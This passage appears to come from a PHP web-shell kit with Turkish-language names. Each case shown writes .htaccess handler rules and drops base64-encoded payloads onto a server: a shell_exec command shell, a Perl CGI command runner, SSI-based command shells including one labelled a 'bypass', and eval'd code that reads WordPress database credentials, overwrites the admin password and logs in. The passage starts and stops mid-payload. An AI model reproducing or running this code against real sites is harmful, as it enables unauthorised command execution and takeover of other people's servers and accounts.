- bj0wIGJnQ29sb3I9IzAwMDAwMCBsZWZ0TWFyZ2luPTAgdG9wTWFyZ2luPTAgcmlnaHRNYXJnaW49
- MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wPjxjZW50ZXI+PFRBQkxFIHN0eWxlPSJCT1JE
- RVItQ09MTEFQU0U6IGNvbGxhcHNlIiBoZWlnaHQ9MCBjZWxsU3BhY2luZz0wIGJvcmRlckNvbG9y
- RGFyaz0jNjY2NjY2IGNlbGxQYWRkaW5nPTIgd2lkdGg9IjEwMCUiIGJnY29sb3I9IzAwMDAwMCBi
- b3JkZXJDb2xvckxpZ2h0PSNjMGMwYzAgYm9yZGVyPTEgYm9yZGVyY29sb3I9IiNDMEMwQzAiPjx0
- cj48dGggd2lkdGg9IjEwMSUiIGhlaWdodD0iMiIgbm93cmFwIGJvcmRlcmNvbG9yPSIjQzBDMEMw
- IiB2YWxpZ249InRvcCIgY29sc3Bhbj0iMiI+PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMzNGRiI+
- DQo8P3BocA0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5Db21tYW5kIFNoZWxsPC9mb250Pjwv
- Yj48YnI+IjsNCnByaW50X3IoJw0KPHByZT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIi
- Pg0KPGI+PGZvbnQgY29sb3I9Ymx1ZT5Lb211dCA6PC9mb250PjwvYj48aW5wdXQgbmFtZT0iYmFi
- YSIgdHlwZT0idGV4dCI+PGlucHV0IHZhbHVlPSJCYXMga29tdXR1IGRheWkiIHR5cGU9InN1Ym1p
- dCI+DQo8L2Zvcm0+DQo8L3ByZT4NCicpOw0KaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOw0KaW5p
- X3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KJGxpejA9c2hlbGxfZXhlYygkX1BPU1RbYmFiYV0p
- OyANCiRsaXowemltPXNoZWxsX2V4ZWMoJF9QT1NUW2xpejBdKTsgDQokdWlkPXNoZWxsX2V4ZWMo
- J2lkJyk7DQokc2VydmVyPXNoZWxsX2V4ZWMoJ3VuYW1lIC1hJyk7DQplY2hvICI8cHJlPjxoND4i
- Ow0KZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPmlkIDo8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7DQpl
- Y2hvICI8Yj48Zm9udCBjb2xvcj1yZWQ+U2VydmVyPC9mb250PjwvYj46JHNlcnZlcjxicj4iOw0K
- ZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktvbXV0IFNvbnXnbGFyMTo8L2ZvbnQ+PC9iPjxicj4i
- OyANCmVjaG8gJGxpejA7DQplY2hvICRsaXowemltOw0KZWNobyAiPC9oND48L3ByZT4iOw0KPz4=
- ';
- $file = fopen("safe.php" ,"w+");
- $write = fwrite ($file ,base64_decode($mini));
- fclose($file);
- echo "<iframe src=safeof/safe.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_28":
- mkdir('cgirun', 0755);
- chdir('cgirun');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddHandler cgi-script .pr";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $cgico = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIw0KIyBQZXJsS2l0LTAuMSAt
- IFtEb2FyIHVzZXJpaSBpbnJlZ2lzdHJhdGkgcG90IHZlZGVhIGxpbmt1cmlsZS4gXQ0KIw0KIyBj
- bWQucGw6IFJ1biBjb21tYW5kcyBvbiBhIHdlYnNlcnZlcg0KDQp1c2Ugc3RyaWN0Ow0KDQpteSAo
- JGNtZCwgJUZPUk0pOw0KDQokfD0xOw0KDQpwcmludCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxc
- clxuIjsNCnByaW50ICJcclxuIjsNCg0KIyBHZXQgcGFyYW1ldGVycw0KDQolRk9STSA9IHBhcnNl
- X3BhcmFtZXRlcnMoJEVOVnsnUVVFUllfU1RSSU5HJ30pOw0KDQppZihkZWZpbmVkICRGT1JNeydj
- bWQnfSkgew0KICAkY21kID0gJEZPUk17J2NtZCd9Ow0KfQ0KDQpwcmludCAnPEhUTUw+DQo8Ym9k
- eT4NCjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+DQo8aW5wdXQgdHlwZT0idGV4dCIgbmFt
- ZT0iY21kIiBzaXplPTQ1IHZhbHVlPSInIC4gJGNtZCAuICciPg0KPGlucHV0IHR5cGU9InN1Ym1p
- dCIgdmFsdWU9IlJ1biI+DQo8L2Zvcm0+DQo8cHJlPic7DQoNCmlmKGRlZmluZWQgJEZPUk17J2Nt
- ZCd9KSB7DQogIHByaW50ICJSZXN1bHRzIG9mICckY21kJyBleGVjdXRpb246XG5cbiI7DQogIHBy
- aW50ICItIng4MDsNCiAgcHJpbnQgIlxuIjsNCg0KICBvcGVuKENNRCwgIigkY21kKSAyPiYxIHwi
- KSB8fCBwcmludCAiQ291bGQgbm90IGV4ZWN1dGUgY29tbWFuZCI7DQoNCiAgd2hpbGUoPENNRD4p
- IHsNCiAgICBwcmludDsNCiAgfQ0KDQogIGNsb3NlKENNRCk7DQogIHByaW50ICItIng4MDsNCiAg
- cHJpbnQgIlxuIjsNCn0NCg0KcHJpbnQgIjwvcHJlPiI7DQoNCnN1YiBwYXJzZV9wYXJhbWV0ZXJz
- ICgkKSB7DQogIG15ICVyZXQ7DQoNCiAgbXkgJGlucHV0ID0gc2hpZnQ7DQoNCiAgZm9yZWFjaCBt
- eSAkcGFpciAoc3BsaXQoJyYnLCAkaW5wdXQpKSB7DQogICAgbXkgKCR2YXIsICR2YWx1ZSkgPSBz
- cGxpdCgnPScsICRwYWlyLCAyKTsNCiAgICANCiAgICBpZigkdmFyKSB7DQogICAgICAkdmFsdWUg
- PX4gcy9cKy8gL2cgOw0KICAgICAgJHZhbHVlID1+IHMvJSguLikvcGFjaygnYycsaGV4KCQxKSkv
- ZWc7DQoNCiAgICAgICRyZXR7JHZhcn0gPSAkdmFsdWU7DQogICAgfQ0KICB9DQoNCiAgcmV0dXJu
- ICVyZXQ7DQp9';
- $file = fopen("cgi.pr" ,"w+");
- $write = fwrite ($file ,base64_decode($cgico));
- fclose($file);
- chmod("cgi.pr",0755);
- echo "<iframe src=cgirun/cgi.pr width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_29":
- mkdir('ssim', 0755);
- chdir('ssim');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddType text/html .shtml
- AddHandler server-parsed .shtml
- AddOutputFilter INCLUDES .shtml
- Options +Includes";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $ssiizo2023 = 'PCEtLSNpZiBleHByPSIkSFRUUF9IQ01EIi0tPjwhLS0jZXhlYyBjbWQ9ImNkICRIVFRQX0hQV0Q7
- ICRIVFRQX0hDTUQgMj4mMSItLT48IS0tI2Vsc2UtLT48aHRtbD48aGVhZD48dGl0bGU+UC5TLlMu
- PC90aXRsZT48c3R5bGUgdHlwZT0idGV4dC9jc3MiPmh0bWwsYm9keSwjanNvbix4bXAsZm9ybSx0
- YWJsZSx0YWJsZSB0ZCxpbnB1dHttYXJnaW46MDtwYWRkaW5nOjA7fWh0bWx7YmFja2dyb3VuZDoj
- MDAwMDAwO30uZXJye3BhZGRpbmc6OHB4O3RleHQtYWxpZ246Y2VudGVyO2JvcmRlcjoxcHggc29s
- aWQgcmVkO2JhY2tncm91bmQ6I2ZmZmZmZjt9I2pzb2Zme21hcmdpbjo1cHggOHB4O30janNvbntk
- aXNwbGF5Om5vbmU7IHBhZGRpbmc6NXB4IDhweDt9eG1wLHRhYmxlLGlucHV0e2ZvbnQ6bm9ybWFs
- IDlwdCAiQ291cmllciBOZXciO2NvbG9yOiNmMGYwZjA7Ym9yZGVyOm5vbmU7fXRhYmxle3dpZHRo
- OjEwMCU7Ym9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlO30udGRuYnJ7d2hpdGUtc3BhY2U6cHJlO31p
- bnB1dHtvdXRsaW5lOm5vbmU7IGJhY2tncm91bmQ6IzAwMDAwMDt9aW5wdXQ6Oi1tb3otZm9jdXMt
- aW5uZXJ7Ym9yZGVyOm5vbmU7fTwvc3R5bGU+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQi
- PnZhciByZXosY21kLGhpc3QsdXNyLHNydixwd2Qsc3VzcixzcHdkO2Z1bmN0aW9uIHRyaW0oc3Ry
- KXtyZXR1cm4gc3RyLnJlcGxhY2UoLyheXHMrKXwoXHMrJCkvZywgIiIpO31mdW5jdGlvbiBpbml0
- KCl7cmV6PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdyZXonKTtjbWQ9ZG9jdW1lbnQuZ2V0RWxl
- bWVudEJ5SWQoJ2NtZCcpO2hpc3Q9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2hpc3QnKTtzdXNy
- PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdXNyJyk7c3B3ZD1kb2N1bWVudC5nZXRFbGVtZW50
- QnlJZCgnc3B3ZCcpO3Vzcj10cmltKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd1c3InKS52YWx1
- ZSk7c3J2PWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzc3J2JykuaW5uZXJIVE1MO3B3ZD10cmlt
- KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwd2QnKS52YWx1ZSk7ZG9jdW1lbnQuZ2V0RWxlbWVu
- dEJ5SWQoJ2pzb2ZmJykuc3R5bGUuZGlzcGxheT0nbm9uZSc7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5
- SWQoJ2pzb24nKS5zdHlsZS5kaXNwbGF5PSdibG9jayc7aWYoc3Vzci5pbm5lclRleHQpe3N1c3Iu
- aW5uZXJUZXh0PXVzcjtzcHdkLmlubmVyVGV4dD1wd2Q7fWVsc2V7c3Vzci50ZXh0Q29udGVudD11
- c3I7c3B3ZC50ZXh0Q29udGVudD1wd2Q7fWNtZC5mb2N1cygpOzwhLS0jaWYgZXhwcj0iIi0tPgpk
- b2N1bWVudC5nZXRFbGVtZW50QnlJZCgnc3Npb24nKS5zdHlsZS5kaXNwbGF5PSdub25lJzs8IS0t
- I2VuZGlmLS0+Cn1mdW5jdGlvbiBlbmRDbWQoKXtpZihzdXNyLmlubmVyVGV4dCljbWQudmFsdWU9
- Jyc7ZWxzZXtjbWQuYmx1cigpO2NtZC52YWx1ZT0nJztjbWQuZm9jdXMoKTt9ZG9jdW1lbnQuYm9k
- eS5zY3JvbGxUb3A9ZG9jdW1lbnQuYm9keS5zY3JvbGxIZWlnaHQ7fWZ1bmN0aW9uIHNlbmRDbWQo
- KXt2YXIgY21kVmFsdWU9Y21kLnZhbHVlO2lmKGhpc3Qub3B0aW9ucyl7dmFyIGlzVW5pcXVlPXRy
- dWUsb3B0Q291bnQ9aGlzdC5vcHRpb25zLmxlbmd0aDtmb3IodmFyIGk9MDtpPG9wdENvdW50O2kr
- KylpZihoaXN0Lm9wdGlvbnNbaV0udmFsdWU9PWNtZFZhbHVlKXtpc1VuaXF1ZT1mYWxzZTticmVh
- azt9aWYoaXNVbmlxdWUpaGlzdC5hcHBlbmRDaGlsZChuZXcgT3B0aW9uKGNtZFZhbHVlLGNtZFZh
- bHVlKSk7fWlmKGNtZFZhbHVlPT0nY2xlYXInKXtyZXouaW5uZXJIVE1MPScnO2VuZENtZCgpO31l
- bHNlIGlmKGNtZFZhbHVlPT0nZXhpdCcpd2luZG93LmNsb3NlKCk7ZWxzZSBpZihjbWRWYWx1ZSE9
- Jycpe3ZhciBhamF4PW5ldyBYTUxIdHRwUmVxdWVzdCgpO2FqYXguY21kPWNtZFZhbHVlO2lmKGNt
- ZFZhbHVlLnN1YnN0cigwLDMpPT0nY2QgJyljbWRWYWx1ZSs9JyAyPiYxOyBwd2QnO2FqYXgub3Bl
- bignR0VUJyxkb2N1bWVudC5VUkwsdHJ1ZSk7YWpheC5vbnJlYWR5c3RhdGVjaGFuZ2U9b25TdGF0
- dXNDaGFuZ2U7YWpheC5zZXRSZXF1ZXN0SGVhZGVyKCdIVVNSJyx1c3IpO2FqYXguc2V0UmVxdWVz
- dEhlYWRlcignSFBXRCcscHdkKTthamF4LnNldFJlcXVlc3RIZWFkZXIoJ0hDTUQnLGNtZFZhbHVl
- KTthamF4LnNlbmQobnVsbCk7fX1mdW5jdGlvbiBvblN0YXR1c0NoYW5nZSgpe2lmKHRoaXMucmVh
- ZHlTdGF0ZT09NCl7aWYodGhpcy5zdGF0dXM9PTIwMCl7dmFyIHJlcz11c3IrJ0AnK3NydisnOicr
- cHdkKyckICcrdGhpcy5jbWQrJ1xuJztpZih0aGlzLmNtZC5zdWJzdHIoMCwzKT09J2NkICcpe2lm
- KHRoaXMucmVzcG9uc2VUZXh0LmluZGV4T2YoImNhbid0IGNkIik9PS0xKXtwd2Q9dHJpbSh0aGlz
- LnJlc3BvbnNlVGV4dCk7aWYocHdkLmlubmVyVGV4dClzcHdkLmlubmVyVGV4dD1wd2Q7ZWxzZSBz
- cHdkLnRleHRDb250ZW50PXB3ZDtyZXMrPSdcbic7fWVsc2UgcmVzKz0nY2FuXCd0IGNkICcrdGhp
- cy5jbWQuc3Vic3RyKDMpKydcblxuJzt9ZWxzZSByZXMrPXRoaXMucmVzcG9uc2VUZXh0O2lmKHJl
- ei5pbm5lclRleHQpcmV6LmlubmVyVGV4dCs9cmVzO2Vsc2UgcmV6LnRleHRDb250ZW50Kz1yZXM7
- ZW5kQ21kKCk7fWVsc2UgYWxlcnQoIkVSUk9SOlxuU3RhdHVzOiAiK3RoaXMuc3RhdHVzKyIgKCIr
- dGhpcy5zdGF0dXNUZXh0KyIpXG5Db21tYW5kOiAiK3RoaXMuY21kKTt9fTwvc2NyaXB0PjwvaGVh
- ZD48Ym9keSBvbmxvYWQ9ImluaXQoKSI+PGRpdiBpZD0ianNvZmYiIGNsYXNzPSJlcnIiPkNhbid0
- IHdvcmsgd2l0aG91dCBqYXZhc2NyaXB0LiBTb3JyeS48L2Rpdj48ZGl2IGlkPSJqc29uIj48IS0t
- I2lmIGV4cHI9IiItLT48ZGl2IGNsYXNzPSJlcnIiPlNTSSBub3Qgd29yay4gU29ycnkuPC9kaXY+
- PCEtLSNlbmRpZi0tPjxkaXYgaWQ9InNzaW9uIj48eG1wIGlkPSJyZXoiPjwveG1wPjxmb3JtIGFj
- dGlvbj0iIiBtZXRob2Q9InBvc3QiIG9uc3VibWl0PSJzZW5kQ21kKCk7IHJldHVybiBmYWxzZSI+
- PHRhYmxlIGJvcmRlcj0iMCI+PHRyPjx0ZCB3aWR0aD0iMTBweCIgY2xhc3M9InRkbmJyIj48c3Bh
- biBpZD0ic3VzciI+PC9zcGFuPkA8c3BhbiBpZD0ic3NydiI+PCEtLSNlY2hvIHZhcj0iU0VSVkVS
- X05BTUUiLS0+PC9zcGFuPjo8c3BhbiBpZD0ic3B3ZCI+PC9zcGFuPiQgPC90ZD48dGQ+PGlucHV0
- IHR5cGU9InRleHQiIGlkPSJjbWQiIHN0eWxlPSJ3aWR0aDoxMDAlIiBsaXN0PSJoaXN0Ii8+PC90
- ZD48dGQgd2lkdGg9IjEwcHgiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSImZ3Q7Jmd0OyIv
- PjwvdGQ+PC90cj48L3RhYmxlPjxkYXRhbGlzdCBpZD0iaGlzdCI+PC9kYXRhbGlzdD48aW5wdXQg
- dHlwZT0iaGlkZGVuIiBpZD0idXNyIiB2YWx1ZT0iPCEtLSNleGVjIGNtZD0id2hvYW1pIi0tPiIv
- PjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJwd2QiIHZhbHVlPSI8IS0tI2V4ZWMgY21kPSJwd2Qi
- LS0+Ii8+PC9mb3JtPjwvZGl2PjwvZGl2PjwvYm9keT48L2h0bWw+PCEtLSNlbmRpZi0tPgo=';
- $file = fopen("pss_v.1.0_min.shtml" ,"w+");
- $write = fwrite ($file ,base64_decode($ssiizo2023));
- fclose($file);
- echo "<iframe src=ssim/pss_v.1.0_min.shtml width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_30":
- mkdir('Ph33r', 0755);
- chdir('Ph33r');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddHandler server-parsed .html .Ph33r";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $sabolamer = 'dXNlckBOaW5qYS1TZWN1cml0eTp+CjwhLS0jZXhlYyBjbWQ9IiRIVFRQX0FDQ0VQVCIgLS0+';
- $file = fopen("Ph33r.Ph33r" ,"w+");
- $write = fwrite ($file ,base64_decode($sabolamer));
- fclose($file);
- $izobasbakan = 'PD9waHAKCiMgVVJMIFNTSQokdXJsUGgzID0gJ1BoMzNyLlBoMzNyJzsKCiAgICBmdW5jdGlvbiBz
- ZW5kKCR1cmxQaDMsJGNtZCkKICAgIHsKICAgICAgICBpZigkY3VybCA9IGN1cmxfaW5pdCgpKQog
- ICAgICAgIHsjIGJ5cGFzcyAyMDExCgkJICMgc2FmZV9tb2QgJiBQSFBTdUhvc2luICYgZGlzYWJs
- ZV9mdW5jdGlvbnMKCQkgIyBCeSBQaDMzcgogICAgICAgICAgICBjdXJsX3NldG9wdCgkY3VybCxD
- VVJMT1BUX1VSTCwgJHVybFBoMyk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENVUkxP
- UFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsLENV
- UkxPUFRfQ09OTkVDVFRJTUVPVVQsMzApOwoKICAgICAgICAgICAgJGhlYWRlcnMgPSBhcnJheSgi
- QWNjZXB0OiAiLiRjbWQpOwoKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9I
- VFRQSEVBREVSLCRoZWFkZXJzKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9Q
- VF9VUkwsJHVybFBoMyk7CiAgICAgICAgICAgIHJldHVybiBjdXJsX2V4ZWMoJGN1cmwpOwoKICAg
- ICAgICB9CiAgICAgICAgY3VybF9jbG9zZSgkY3VybCk7CiAgICB9CiAgICBwcmludCAnPGhlYWQ+
- Cjx0aXRsZT4gUGgzM3IgLSBieXBhc3MgMjAxMSBTU2kgPC90aXRsZT4KPHN0eWxlIHR5cGU9InRl
- eHQvY3NzIj4KLmF1dG8tc3R5bGUxIHsKCXRleHQtYWxpZ246IGNlbnRlcjsKfQouYXV0by1zdHls
- ZTIgewoJdGV4dC1hbGlnbjogY2VudGVyOwoJZm9udC13ZWlnaHQ6IGJvbGQ7Cglmb250LWZhbWls
- eTogQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZjsKfQouYXV0by1zdHlsZTMgewoJdGV4dC1h
- bGlnbjogY2VudGVyOwoJY29sb3I6ICNGRjk5MzM7Cn0KLmF1dG8tc3R5bGU0IHsKCWZvbnQtc2l6
- ZTogeHgtc21hbGw7Cglmb250LXdlaWdodDogYm9sZDsKfQphIHsKCWNvbG9yOiAjQzBDMEMwOwp9
- CmE6dmlzaXRlZCB7Cgljb2xvcjogI0MwQzBDMDsKfQphOmFjdGl2ZSB7Cgljb2xvcjogI0MwQzBD
- MDsKfQphOmhvdmVyIHsKCWNvbG9yOiAjQzBDMEMwOwp9Cjwvc3R5bGU+CjwvaGVhZD4nOwogICAg
- cHJpbnQnPGJvZHkgc3R5bGU9ImNvbG9yOiAjRkY5OTMzOyBiYWNrZ3JvdW5kLWNvbG9yOiAjNjY2
- NjY2OyAiPgoKPGRpdiBjbGFzcz0iYXV0by1zdHlsZTMiPgonOwogICAgcHJpbnQgJwk8c3BhbiBj
- bGFzcz0iYXV0by1zdHlsZTIiPlNTSSBleHBsb2l0IC0gJy4kdXJsUGgzLic8L3NwYW4+IDxiciBj
- bGFzcz0iYXV0by1zdHlsZTQiIC8+PGJyIC8+JzsKCXByaW50ICc8L2Rpdj4nOwogICAgcHJpbnQg
- JzwvZGl2Pgo8Zm9ybSBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI+Cgk8ZGl2IGNsYXNzPSJhdXRv
- LXN0eWxlMSI+JzsKCiAgICBwcmludCAkX1BPU1RbJ2NtZCddLic6IDxiciAvPic7CiAgICBwcmlu
- dCAnPHRleHRhcmVhIHdyYXA9Im9mZiIgc3R5bGU9IndpZHRoOiA2OTdweDsgaGVpZ2h0OiAyOTNw
- eCIgbmFtZT0iUGgzM3IiPicuIHNlbmQoJHVybFBoMywkX1BPU1RbJ2NtZCddKSAuJzwvdGV4dGFy
- ZWE+PGJyIC8+JzsKCiAgICBwcmludCAnPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCIgdmFs
- dWU9InVuYW1lIC1hIj48YnIgLz4nOwoKICAgIHByaW50ICc8aW5wdXQgdHlwZT0ic3VibWl0IiB2
- YWx1ZT0iUGgzM3IiPjxiciAvPic7CiAgICBwcmludCAnPC9kaXY+IDwvZm9ybT4KIDxhIGhyZWY9
- Imh0dHA6Ly9wZW50ZXN0LmVua24ubmV0L2Jsb2cucGhwIj4gCjxwIGNsYXNzPSJhdXRvLXN0eWxl
- MSI+TmluamEtU2VjdXJpdHkgdGVhbTxwPjwvYT4KPHAgY2xhc3M9ImF1dG8tc3R5bGUxIj4KPGZv
- bnQgY29sb3I9IiNGRjAwMDAiPjxiPkFudGktdHJ1c3QgLSBQaDMzciAtPGZvbnQgY29sb3I9IiNG
- RjAwMDAiPkJsYWNrIApIYXQgLSBtYXowMDI8L2ZvbnQ+JzsKcHJpbnQgJzxwIGNsYXNzPSJhdXRv
- LXN0eWxlMSI+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj48Yj4gd2VsY29tZS1iYWNrIDogc2VjLXIx
- ei5jb20gPC9mb250PjwvYT4gPC9iPic7Cgo/Pg==';
- $file = fopen("Ph33r.php" ,"w+");
- $write = fwrite ($file ,base64_decode($izobasbakan));
- fclose($file);
- echo "<iframe src=Ph33r/Ph33r.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_77":
- eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAiMCIpOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQpAc2Vzc2lvbl9zdGFydCgpOw0KJGJhc2VfcGF0aCA9IGRpcm5hbWUoX19GSUxFX18pLicvJzsNCg0KDQpmdW5jdGlvbiBlbnRyZTJ2MigkdGV4dCwkbWFycXVldXJEZWJ1dExpZW4sJG1hcnF1ZXVyRmluTGllbiwkaT0xKXsNCiAgICAkYXIwPWV4cGxvZGUoJG1hcnF1ZXVyRGVidXRMaWVuLCAkdGV4dCk7DQogICAgJGFyMT1leHBsb2RlKCRtYXJxdWV1ckZpbkxpZW4sICRhcjBbJGldKTsNCiAgICByZXR1cm4gdHJpbSgkYXIxWzBdKTsgfQ0KDQpmdW5jdGlvbiByYW5kb210KCkgew0KICAgICRjaGFycyA9ICJhYmNkZWZnaGlqa21ub3BxcnN0dXZ3eHl6MDIzNDU2Nzg5IjsNCiAgICBzcmFuZCgoZG91YmxlKW1pY3JvdGltZSgpKjEwMDAwMDApOw0KICAgICRpID0gMDsNCiAgICAkcGFzcyA9ICcnOw0KICAgIHdoaWxlICgkaSA8PSA3KSB7DQogICAgICAgICRudW0gPSByYW5kKCkgJSAzMzsNCiAgICAgICAgJHRtcCA9IHN1YnN0cigkY2hhcnMsICRudW0sIDEpOw0KICAgICAgICAkcGFzcyA9ICRwYXNzIC4gJHRtcDsNCiAgICAgICAgJGkrKzsNCiAgICB9DQogICAgcmV0dXJuICRwYXNzOw0KfQ0KDQpmdW5jdGlvbiBpbmRleF9jaGFuZ2VyX3dwKCRjb25mLCAkY29udGVudCkgew0KICAgICRvdXRwdXQgPSAnJzsNCiAgICAkZG9sID0gJyQnOw0KICAgICR1c2VybmFtZSA9IGVudHJlMnYyKCRjb25mLCJkZWZpbmUoJ0RCX1VTRVInLCAnIiwiJyk7Iik7DQogICAgJHBhc3N3b3JkID0gZW50cmUydjIoJGNvbmYsImRlZmluZSgnREJfUEFTU1dPUkQnLCAnIiwiJyk7Iik7DQogICAgJGRibmFtZSA9IGVudHJlMnYyKCRjb25mLCJkZWZpbmUoJ0RCX05BTUUnLCAnIiwiJyk7Iik7DQogICAgJHByZWZpeCA9IGVudHJlMnYyKCRjb25mLCRkb2wuInRhYmxlX3ByZWZpeCAgPSAnIiwiJyIpOw0KICAgICRob3N0ID0gZW50cmUydjIoJGNvbmYsImRlZmluZSgnREJfSE9TVCcsICciLCInKTsiKTsNCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXJuYW1lLCRwYXNzd29yZCk7DQogICAgaWYoJGxpbmspIHsNCiAgICAgICAgbXlzcWxfc2VsZWN0X2RiKCRkYm5hbWUsJGxpbmspIDsNCiAgICAgICAgJGRvbCA9ICckJzsNCiAgICAgICAgJHJlcTEgPSBteXNxbF9xdWVyeSgiVVBEQVRFIGAiLiRwcmVmaXguInVzZXJzYCBTRVQgYHVzZXJfbG9naW5gID0gJ2FkbWluJyxgdXNlcl9wYXNzYCA9ICcwYTU2Zjg2YTRlYTc4OWY1NTVjMmJkZmFmYjYxZmQ0YScgV0hFUkUgYElEYCA9IDEiKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkb3V0cHV0Lj0gIlstXSBEQiBFcnJvcjxiciAvPiI7DQogICAgfQ0KICAgIGlmKCRyZXExKSB7DQoNCiAgICAgICAgJHJlcSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBmcm9tICBgIi4kcHJlZml4LiJvcHRpb25zYCBXSEVSRSBvcHRpb25fbmFtZT0naG9tZSciKTsNCiAgICAgICAgJGRhdGEgPSBteXNxbF9mZXRjaF9hcnJheSgkcmVxKTsNCiAgICAgICAgJHNpdGVfdXJsPSRkYXRhWyJvcHRpb25fdmFsdWUiXTsgDQoNCiAgICAgICAgJHJlcSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBmcm9tICBgIi4kcHJlZml4LiJvcHRpb25zYCBXSEVSRSBvcHRpb25fbmFtZT0ndGVtcGxhdGUnIik7DQogICAgICAgICRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlcSk7DQogICAgICAgICR0ZW1wbGF0ZSA9ICRkYXRhWyJvcHRpb25fdmFsdWUiXTsNCg0KICAgICAgICAkcmVxID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIGZyb20gIGAiLiRwcmVmaXguIm9wdGlvbnNgIFdIRVJFIG9wdGlvbl9uYW1lPSdjdXJyZW50X3RoZW1lJyIpOw0KICAgICAgICAkZGF0YSA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXEpOw0KICAgICAgICAkY3VycmVudF90aGVtZSA9ICRkYXRhWyJvcHRpb25fdmFsdWUiXTsNCg0KICAgICAgICAkdXNlcmFnZW50PSJNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjBiOyBXaW5kb3dzIE5UIDUuMTsgLk5FVCBDTFIgMS4xLjQzMjI7IEFsZXhhIFRvb2xiYXI7IC5ORVQgQ0xSIDIuMC41MDcyNykiOw0KICAgICAgICAkdXJsMj0kc2l0ZV91cmwuIi93cC1sb2dpbi5waHAiOw0KDQogICAgICAgICRjaCA9IGN1cmxfaW5pdCgpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsMik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsImxvZz1hZG1pbiZwd2Q9c2x5bW4xMjMmcmVtZW1iZXJtZT1mb3JldmVyJndwLXN1Ym1pdD1Mb2cgSW4mdGVzdGNvb2tpZT0xIik7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkdXNlcmFnZW50KTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICJDT09LSUUudHh0Iik7DQogICAgICAgICRidWZmZXIgPSBjdXJsX2V4ZWMoJGNoKTsNCg0KICAgICAgICAkcG9zID0gc3RycG9zKCRidWZmZXIsImFjdGlvbj1sb2dvdXQiKTsNCiAgICAgICAgaWYoJHBvcyA9PT0g